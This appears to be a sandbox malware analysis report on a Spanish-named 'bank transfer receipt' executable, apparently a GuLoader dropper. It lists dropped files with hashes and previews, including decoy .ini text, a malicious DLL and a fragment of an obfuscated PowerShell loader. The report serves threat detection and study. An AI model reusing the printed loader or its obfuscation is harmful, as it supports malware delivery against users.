	Hornswoggle.exe	Get hash	malicious	GuLoader	Browse
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	anziOUzZJs.exe	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067048558044828
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqi:2JIB/wUKUKQncEmYRTwh0G
MD5:	43C14F8AC9AE9A3A261689E0DBB949A3
SHA1:	2512D742FBCB6A1DE41037644E03AC4B21A99B2A
SHA-256:	ABB424BA7186B7A6DED5B2956406BC3592B2D96CA59B5D59BD59DCE6EDF2A1BC
SHA-512:	1C0AB54F68F8BE2AF355CA5CA5D37DD781E6E8AB66AB880209058F19350CD05AE0AE9F469993DAF1A13E41D583D435A169CA45BEF2A359D2AA5E5548000095B2
Malicious:	false
Reputation:	low
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x07969fb9, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899969871479358
Encrypted:	false
SSDEEP:	1536:rSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:razaPvgurTd42UgSii
MD5:	4106912BAA691DFF683C141706BB7ADB
SHA1:	3BF4A56A44F8F872BB6757AFEDCBC02B0C2FA1BB
SHA-256:	D2AC11A7583C39DEA2848A5EC223F77827B54497B810560330BC6B21DCA2BC4E
SHA-512:	96714FE05A90EF997DC32B47F13662F840F9640F1C110E466A1B300568E5E5DFEB13485C7613761A58AE85E9FC1E6D54CF17566596DB21BC61B1F398C8D1700E
Malicious:	false
Reputation:	low
Preview:	....... ...............X\...;...{......................0.`.....42...{5......}q.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..........................................}.....................q.....}q..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08104425986339275
Encrypted:	false
SSDEEP:	3:I+vdYeRPcUHveqt/57Dek3J8i/vU9AllEqW3l/TjzzQ/t:IQdzRP5vPR3t8i/sAmd8/
MD5:	C25917F2B700273B173FAB2EED6B03BE
SHA1:	F90E2B1084D264CF8392CBEADEAC681680224CA9
SHA-256:	D9B79A12EA4AD524032A590B43755EA49982F1E23C04584148F7304B8C67C6F5
SHA-512:	7DFE65EF488AC65B5493F17BCD3D0C63B7809F126F5E91C143E5A26A3BBA89AD4368A6C22FFE680911B1CE195063398B04248ECCE84828D6CA690242FE0981C4
Malicious:	false
Reputation:	low
Preview:	........................................;...{.......}q.42...{5.........42...{5.42...{5...Y.42...{59...................q.....}q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmuiusmj.ktx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5341kk.ow4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdwkqgf3.xcs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcytcxtt.ul5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsmE667.tmp

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	data
Category:	dropped
Size (bytes):	730304
Entropy (8bit):	6.511889335689603
Encrypted:	false
SSDEEP:	12288:yQG67SBR7WEFZPXYdGofH9SfqmmG1e60RE0D9adX+ry08M:yN67adDGfH9Sn1Um49+X+20t
MD5:	A441F788E9547C06CB2A0CB080E5544D
SHA1:	BE7E96C3A31013B40CC2C26044D65CE6F0FC5906
SHA-256:	ED34E5B30F5209515F55BA9B5C4BD3D4607CCC763F3C8F27D32D84D0C6822CB1
SHA-512:	C472F3C3DB81BD6B486F649DD1B8F54161B6C52C969AAE6758E8F0685F003C547C840983F0D6AD36E3BE6531FFA0F7F8879A53E96AF2101D60FC3E7F16EACC64
Malicious:	false
Preview:	. ......,...................\...........<........ ..........................................................................................................................................................................................................................................J...`...........@...j...............................................................................................................................@...............4.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: textless.exe, Detection: malicious, Browse Filename: URGENTE Ref.exe, Detection: malicious, Browse Filename: lkETeneRL3.exe, Detection: malicious, Browse Filename: Hornswoggle.exe, Detection: malicious, Browse Filename: Hornswoggle.exe, Detection: malicious, Browse Filename: Overheaped237.exe, Detection: malicious, Browse Filename: 66776676676.exe, Detection: malicious, Browse Filename: anziOUzZJs.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Dareful.ini

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	233
Entropy (8bit):	4.218275149059182
Encrypted:	false
SSDEEP:	6:5qlvVqDqHfspV6rvAYEOElcTgWNKnX4iEda:5q32pYNEO5mnX4nk
MD5:	C3DFE131F54C74B2E7B579D1DFD08F6D
SHA1:	5AE446BC9D0C1997D20987F8660AE5C7ABC1712D
SHA-256:	35370D35DCD5D967D9517571DAB47B3BF8F34E0B385E9C57A22579CBE7BA1ACC
SHA-512:	6E5461A9CF59E1384C41B34EDAC861983C2344BD4C90314579C87D0AEA8AE56D4B4707537074A1E7BE4E09506A1AF148E03330A0CAC272306158173DD0E10E3D
Malicious:	false
Preview:	..........Concomitant forngtelsernes trip straffefaststtelsernes wedgeable rooibok gutturonasal hemateins blrehalskirtel nudlers asparagic..Healthiest besttelsestidernes neuratrophia potlikker fodtudser stenkulsnaftaens moncassin....

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\Erymanthian\Neutrophilic\folioformat.ini

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.650033481879272
Encrypted:	false
SSDEEP:	6:3MXfLWtAJWKdAZXEmvySvuiAWAVZ0evPWhyIGFhenMmJtc12oan:cXIAndApdLvuizAVeWPWhyIGfaCan
MD5:	20E81A81FC8DBE56A8D7D364E928C500
SHA1:	4B9B7F0C641ADAC095D1514CF577037C04F02AB4
SHA-256:	A0C87FECB84E9F2724B64805BAD60D1A7D7669AEB591FB8A000FA3E4DB5027CD
SHA-512:	F9BFFC80201DFCF3A71E3446460D1686648AF754E2C5A5F489ECC12D58393A128E052E38D42F22822E836E43402E36871FA8585D83CE7CD5510ACA8992715ABA
Malicious:	false
Preview:	Hospitalsindlggendes infiltreringens regosols brges redroot dragere gemmel......[SUPPLERET SUPERMARKED]........;lactescense optrvlingers ella uigendriveligt harnisks,standardrutiners tvetullerne propped equiaxial fliglben barokstils......

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\Erymanthian\bouleuterion.jpg

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 789x302, components 3
Category:	dropped
Size (bytes):	30202
Entropy (8bit):	7.96328907923243
Encrypted:	false
SSDEEP:	768:fA6owDYF36Pe9nBJSuz3DWwp0I1lkTgU2DbYyp2F:fA6oiYB6PwBouzT8IITXI5p2F
MD5:	E764FB01E297D91C48E29D363277EFC0
SHA1:	60549A56341278224B647E7B831EBE1206FAE804
SHA-256:	6026318F3F4BEBE143472FD97D8547AAE293EE7926F0BD5AC4D0FF984A597636
SHA-512:	94B5E5CD9748826061BE70F4B46A3E6CA79F6AC4872E90317DEA10F832AA0A8475465077D586A20DD7A817F6E0FC45C153092909797DAE8DD76FAB64C1C81BC4
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...y.TS...I..0.S.J@...7.G.p...7.. 4.j0i.X.i.Z.RgT&..KM..5....(ZL.KS...O..!j...i....@.$w..IL-Q.V....+=F..i5.G$.p&.ny......f..d.f.4...c.(....L.K.....Pj..&..5.4..%..-34..C....4S.Q.1F(......C...I...DDSMJG.0....i.!..h.2)1Rb....)@......Zn)...(....v..J.;5..7..)4.....jb.Z.$SK..P!.......\...uG..u...7R...Rf......34..q.8.i4f.4.R.RQIJ.QE.\\|.QE..(..4.Qq.IK.1J.r.4S.F(.Q.S

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\Zeta.ini

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	287
Entropy (8bit):	4.336041032067111
Encrypted:	false
SSDEEP:	6:fm3IxZWR4yEGSD7VrOavIWEZbSEtL7lrQXQKfK6pPWFEfv:OYxYtEGSDhOavIb8CLpYL7phH
MD5:	48B038CB1F14E0CA6216EB477C067408
SHA1:	C98C0F9A1F16915BB059AA669550FAD3BA6524B7
SHA-256:	FD1F8E9AC351D575369FDA7517CE61DD2043020AE1F7B9A8CBA005FB23D56758
SHA-512:	2965FB40411840CA6E6CFD7B585EE78BED502216318959980E0CA299DFAAE6B50B5A7AD65DBDEC52141FC1C07D1FB7433BCAE94F73473238D78BEE81218D9E76
Malicious:	false
Preview:	..........ariadnetraades skulptureres laparotomize.Taposa mutinado runcinate kittlest slagtende finlandssvensker eftertnksomhed boldtrers pygobranchiate ramekin......;opstramninger disshroud typewrited kreaturerne.Socialbedragerierne tappestederne kanonfotografens moralism seams sudle..

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\ballfield.ass

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	data
Category:	dropped
Size (bytes):	58928
Entropy (8bit):	1.2626939660154362
Encrypted:	false
SSDEEP:	768:pcAfk+AnbgQe+kPrlVrzlhdL6jx11ouGwM/8:59Nkv
MD5:	6535DEC4BB3F4914D6A60901948B358B
SHA1:	273D708F01C72B4BC4C6D36C4484524AE2A37F4B
SHA-256:	68CD4323973D5277998D8B60B3C987577B010CA6F8D3ADE7A3E7D1231F8F0553
SHA-512:	6C1749CCBFE7760EAC9F3A6BF3EE5C5A045A7CBEDC2B2EC237AD3CF85657769BEDBC41EDB56D44261404535405AEDD0AF2C3DC450675A9F2A1D29D78DD616647
Malicious:	false
Preview:	.3..............:.......U.....................................V....i.......................Y........................'............................8.............................................................+...........n..........H.................................................Y....@............................................................c..'.................."............................N.........................t......................S.....................5.....Q.....................................h....................N..................................[........................................................................F..........................&............................................................/.......................................................a....2....N........................................]........................K.............................X.................................2...........?...................................*..................B.......

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\boring.jpg

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 494x14, components 3
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	7.5992816081270815
Encrypted:	false
SSDEEP:	48:D9YMOuERAOlmjUk4ndU2/AlwlfTz8M8VMIlVKBKu6uLFH+:RhREphu2tlKHlG36uZe
MD5:	BDA63CF861821105FE9B4300C8E8F25B
SHA1:	3AAB8B61C8BE65D854CE55441B26622966FE98F8
SHA-256:	E79E64130443631CDD1DBBFB8C6B8427317781A3C50CA17D10A6C14027A82EEB
SHA-512:	BABC1FBA905052303A9476ADDD92F8FED88E334199E307AD547304E17708B9824AE1FFC91DCC6C6DE10976D841ABA946E28B5D6D0BDD4DAB102AE73594975943
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...#.X............j........H>...S.......!........u.\.g...5....................7._..]r...?.1....]...C.(.]...........<G..iG.t...?.^b\|q.f......._...........:......O.._....t.....$>'...j.......A.?.....o.v.W..1..(..!.....I...~..j..O.......!.5.9..#.............J.......R..a.....Z.D....?..?.J5}@t....C.4s......N....?..8h...O.Dkz...r?...8x.W.5......G<{.,

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Rouladen.het

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	data
Category:	dropped
Size (bytes):	72519
Entropy (8bit):	1.2387524314484188
Encrypted:	false
SSDEEP:	768:SdEY131pbEUmrewkV9ctzrG7VMIR+ephQF9gar:SR1FpYUOkbcBWV5UephQF3
MD5:	7F0CD3FC131454E3BE7C008F0D57CC74
SHA1:	F7372E8B267C4BE1CEF645C6EA6B458FD6A0F84F
SHA-256:	D2215E2114436DB47D0AEE954F0565A8555489C91961458D8D4F70778F9B72EC
SHA-512:	152ADBC7546240D65F202C88AE96B5FBDFF98E2D0DA071205DD3549FB8B882F4AE163A2E20DE9C49867F590940F611375E9E04673E11F375B74D6659E0AF2B96
Malicious:	false
Preview:	yy.y.yyyyyyy.yy.yyyyyyy.yy.yyyyyyyyyyyyyyyoyyyyyyyy.yyyyyyyyy.yyyy.yyyy.yyyyyyyyy.yyyyyryyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyynyyyyyyyyyyyyyyyyyyyyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyy.yy$.yyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyy.yy1yyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyjyjyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyy#yyyyyyyyy.y.yyyyyyyyyyyyyyyyyyyyyyyy.yyy.yyyyyyyyyyyyyyyyyyyoyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyylyyyyyyyyyyyyyyyyyyCyyyyyyyyy\yyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyy.yymyyyy.yy.yyyyyyy.yyyyyyyyyyyyyyyyyy^yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyydyyQ.yyyyyyVyyyyyyy0yyyyyyy.yyyy3yyyyyyyyy.y.y.yyyyyy#yyyyyyyy`yyyyyyyyyyyy.yyyyyyyyyy[yYyyyyyy.yyyyyyyyyyyyyyyyyyyyy..yyyy...yy.yyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyy]yyyyyyyyyyyyyyyyy.yyyyyyyy^yyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyyyyyyyyyyy..yyyyyyyyyyyyyyyyyyyyyyyyyyyyeAyyy.yy.yyyy.yyyyyyyyyyy#y.yyyyayyyyyyyyyyyyyyyyyyyyyyyyyyyyy..y.yyyyyytyyy.yyyyyyyyyyyyyyy.yg.yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:y.y*yy

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3221), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	52877
Entropy (8bit):	5.344605329725091
Encrypted:	false
SSDEEP:	1536:dU7gkiOXzqIDvorYw1kOq4cdlZqJ6wYwoizB:dAgkDXz6Uw1dWlZqJKwoeB
MD5:	D1ED37289F5FB5E649384FDB0DB48824
SHA1:	5F0DB5AE2A48C03AB4896ED9038C35E3074E2AEC
SHA-256:	9BB1241828381E2A6E7D73A22C34DEEA60EE5DE152C27DEAC0F0FD81F24BA8FD
SHA-512:	5CC0B7495C5C03B59AE2DC8BB568956B9536A83AE6DBD4BB1F9DEDB763F34A65B403E27E7551A38C14CA9B25B828869D6DCADA5F33B7EEA74E3C1F375D5FFDD6
Malicious:	false
Preview:	$Scripto=$Uroceridae;........$Balmoral = @'. Tung.Retti$FrigoUTrh,edEncomsLaeseaNonacnAcuteeGenkerP ecoe SynsdIlvu eSelvo= nthr$R heaK onoco AirggTrianaDunitlSh llsBurglkUnderaInvadbUnsansPrecosbesaatMaadetMi.altAlmine Tj.n;Gylpe. ,trufFinanuPeriknScum c Hut,tBaciliOctonofriginUdenv Kabe B,rudsi In,usAna yp DivioOmnifr Pe io Di su ellosTribo Rivet(Pleom$UnderPFrster .lveoOverspMyrmeaNeglegHalv eBeslarFredee galed EpideUdrje,Antid$KrserNSkif oS,lennLadencNeu ou.astel AfsktgylteuAuthoradviseUn ro1Bel.i8 Turn)Nutri Hkut{Kis,e.sp.re.Trrep$Eta,rSI,tero Syler FerftSlewekbedo,u udvunlazzas OpkltOsciln inete tragr Yvere Myttn apon1Dynel5Fenno9Epidi Penoc(CharmBRyotcoTri,nn Arkau ambrsVelbesPost,eBrevhr,ynopnGlopneOpall ,ipp'.olitUOpinanSpl swUnfeni.eriatCorve$ Mica SkiogINonf nSkuttfAaregr SaksPAktieaP,armuHusbltCogenoS ksatRo,anrTnderA Forl PrediaFejlrdspndeoUfiksoSalm MMowh eDem llToldblNavn eKapitpAcr gSFiliotTvil,aKillil dea.d StikaSkoleCForskhAshozr UndeyBellisfors,gT get CirkT CirkyH

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Opholdsrum.Rug

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	data
Category:	dropped
Size (bytes):	342620
Entropy (8bit):	7.678127857392338
Encrypted:	false
SSDEEP:	6144:3eQG67SrbB4a7REP3EQCZPIDZuY7xGofXH9SfyDWuY0DGvVmU41gyae60RZ:uQG67SBR7WEFZPXYdGofH9SfqmmG1e6u
MD5:	7C974E416FB7A361D638F19ADA52C3D8
SHA1:	567D2D0538CA6257491378ADE34927F4293E5E8C
SHA-256:	D4E2F627C7527D32AE29F1B3A19F1D2689C46DE4720A8C8028129AA463BF132C
SHA-512:	80652786BEFE75F1D51FFF39857C4E149F1A4B108BA7D7F63EFD47B5D3CB78FFA44CCA1D44DC8A1C4281998CEE33047BE95F4A9C8F4128B0BD134041F5F4344B
Malicious:	false
Preview:	......%......E..U.....k.....>.DD.{...&&&&&&.......................................................................l.\|..#.......''...#...D................RR.........._.....+..y.....e.nnn.................aaa........................{{.yyyy..q.......q...........O......L.FFF.ii...n........#.........................8.l....................*......................``.................HH..............................h........%%.........//...M....o...............777..........x........ww......................&&&&&&............--....................rrrrr.............??................../..jjj.....(..pp............g...%%..>>...........?..666........OO...................555.....000000..............................ZZ....@@@...............DD.............b.........6............&&.'......nn.]]...\...,,..............NN............)......k.>........MM.......0....$$.......AAAA........a............................C.....O..........R......&..2.4444.2.....(............s.........;..........z.................[...

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	630000
Entropy (8bit):	7.686660839568218
Encrypted:	false
SSDEEP:	12288:JowisraETM9ugWezmvhPngvAByum4Tqv7gcDcb:Jow/ra8M9ube4nuAkum4jcDC
MD5:	3CD2F0506C8504484BB4CBB46A00B939
SHA1:	E2330873735BD34A0D65C54AB718CC66D4A9A18D
SHA-256:	9A695A466508DFA3BE2F7749A0DC12F10B4769A4475D14556371C98F66FC0B68
SHA-512:	D42A32FDEAB1CAB11CE0A3878DEDDBE8554B3F1B6A4E3D0E28562F2CC376180FBB2F16AF2B2FC7DFDBC0B8CBA485C1D546D1EC11FE077EBA9B1DAE4050ACFD52
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....c.W.................^..........+2.......p....@.......................................@.................................(t.......0..`............................................................................p...............................text....].......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...`....0.......z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\linienummereringen.sne

Download File

Process:	C:\Users\user\Desktop\justificante de transferencia09454545.exe
File Type:	data
Category:	modified
Size (bytes):	137003
Entropy (8bit):	1.2600579103434955
Encrypted:	false
SSDEEP:	3072:uKbwmcqCZm6iSGPcUXjGbjGUrM4g7Rl6YU360:zty80
MD5:	CD7A4998B070AE1001296759049A525C
SHA1:	C338E0DE9A9A533D5FFC6AE8494D84BDEA8A411C
SHA-256:	BBCFADD87CF92C51FFE7BDEA5F2E025E16CAD3BCDEE331293EC5C925BD23956F
